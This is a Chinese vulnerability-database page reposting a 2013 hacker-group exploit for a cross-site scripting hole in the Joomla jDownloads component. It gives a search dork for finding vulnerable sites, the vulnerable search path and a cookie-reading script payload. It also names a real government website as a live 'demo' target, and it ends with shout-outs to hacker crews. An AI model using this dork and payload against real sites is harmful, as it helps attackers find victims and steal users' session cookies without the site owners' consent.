Joomla com_jdownloads Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044573 漏洞类型
发布时间 2013-08-19 更新时间 2013-08-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080149
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#####################################
Title:com_jdownloads xss Vulnerability
#####################
##############################################################

  __  __          _____  _      ______ ______ _______ _____
 |  \/  |   /\   |  __ \| |    |  ____|  ____|__   __/ ____|
 | \  / |  /  \  | |  | | |    | |__  | |__     | | | (___
 | |\/| | / /\ \ | |  | | |    |  __| |  __|    | |  \___ \
 | |  | |/ ____ \| |__| | |____| |____| |____   | |  ____) |
 |_|  |_/_/    \_\_____/|______|______|______|  |_| |_____/

##############################################################
#Author:Darksnipper  & Dream.killer

#Email:Darksnipper@live.com

#####################################
#Home:-	 www.MadLeeTs.com
#####################################

Vendor Link:Www.jdownloads.com

Dork:-inurl:"component/jdownloads/search"

Tested On:- Windows 7,Linux,Windows xp

######################################################################
#P.o.c

http: //127.0.0.1/components/jdownloads/search

payload

<script>alert(document.cookie)</script>

Demo:-

http://dsya.goa.gov.in/component/jdownloads/search

payload:-
<script>alert(document.cookie)</script>


########################################################################
Greetz:Dream.killer,Soul~inj3ct0r,Error Haxor,Fazil
Mir,Force-Ex,x3o-1337,Shadow008,1337,H4x0rl1f3,Invectus,Sahrawi
Hacker,HaXor KaKKa,Retno Pro, Tr4ck3r,b0x,Gujjar Pcp,madc0de Haxor,P4k
Command3r,Pain006,Anon DeXter,MindCracker,Ap3x Pr3d1at0r,Ment@l
Mind,Sujit Ujale,All Madleets Members,Kashmiri Hackers & All Freedom
Fighters.
########################################################################